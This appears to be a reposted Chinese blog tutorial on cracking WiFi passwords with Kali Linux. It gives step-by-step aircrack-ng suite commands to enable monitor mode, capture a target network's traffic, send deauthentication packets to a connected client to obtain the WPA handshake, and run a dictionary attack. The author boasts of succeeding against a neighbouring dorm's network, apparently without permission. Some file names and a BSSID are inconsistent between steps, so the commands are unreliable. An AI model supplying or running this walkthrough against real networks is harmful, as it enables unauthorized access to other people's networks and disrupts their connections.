使用kali破解wifi密码
提示:下面的所有命令都以root用户执行
一、关闭网络和结束可能会影响结果的进程
1、关闭网络
1
service network-manager stop
2、结束可能会影响结果的进程
1
airmon-ng check kill
二、开启无线网卡到监听模式
1、查看网卡列表
1
iwconfig
2、启动网卡到监听模式(这里使用wlan0)
1
airmon-ng start wlan0
三、监听周围的无线网络连接并获取握手信息
##1、监听周围所有无线网络信息
airodump-ng wlan0mon- 在这条命令中
wlanmon是上一步中我们得到的接口名
说明:图下半部分,列BSSID下要有非(not associated)行才行,
上图中最后一行就是:C0:XX:XX:XX:XX:00?14:XX:XX:XX:XX:B4?-87?0 - 1?3? 2
这时,记下C0:XX:XX:XX:XX:00
并在图的上半部分中找对应C0:XX:XX:XX:XX:00行
记下CH列下的值为1。然后关闭此窗口。
##2、监听感兴趣的无线网络
根据上一步的结果执行如下命令:
1
airodump-ng --bssid C0:XX:XX:XX:XX -c 1 -w tmp wlan0mon
在这条命令中–bssid后接我们上一部接下的BSSID值,即:
C0:XX:XX:XX:XX:00。而-c后接的是我上一步在CH列下找到的值1。
而-w后接的是我们保存网络数据的文件名,这里是用tmp。在命令的最后接的是之前得到的mon0
运行命令后会得到上图的结果,并确保上图的下半部分BSSID下有至少一行的数据
(用我楼下寝室的WiFi做测试----(●ˇ∀ˇ●)) ##3、得到握手包
- 保持上一步中的窗口不关,新开一个窗口
执行如下命令:
1 | aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 wlan0mon |
- 在这条命令中参数-a后接的是上图中下半部分BSSID列下第一行的的值
C0:XX:XX:XX:XX:00。参数-c后接的是上图中下半部分STATION列下第一行的的值14:XX:XX:XX:XX:B4。wlan0mon是之前步骤得到的值。执行后:观察我们步骤2中未关闭的窗口中是否出现了下图中红款中的内容。如果没有出现那就再等几分钟再次执行本步骤中的命令,直到出现。如果执行了超过30次或者时间超过30分钟依然没有出现,建议换一个感兴趣的网络。
四、停止监听
##1、关闭监听接口
1 | airmon-ng stop wlan0mon |
##2、启动网络
1 | service network-manager start |
五、获取密码
此时在执行第3.2步骤中命令的目录下会有一个tmp-01.cap文件。有了这个文件我们就可以破解密码了,除了这个文件外,我们还需要一个字典文件。可以从这里下载,下载后解压出密码文件,假设其名字及路径为:/tmp/passwd.txt。(将密码文件放在tmp目录下)执行下面的命令。如果密码字典中有这个wifi的密码,我们就可以破解出密码:
1
aircrack-ng -w /tmp/123.txt tmp-03.cap
1 | tmp-03.cap:得到的握手包 |
###经测试,密码正确,哈哈哈哈哈哈(●ˇ∀ˇ●)
- 提示:如何将密码字典放入指定文件夹中
from http://web.archive.org/web/20210811030537/https://www.weiyubo.top/2017/10/16/Kali%20%E7%B3%BB%E7%BB%9F%E4%B8%8B%E8%BF%9B%E8%A1%8CWIFI%20%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/
No comments:
Post a Comment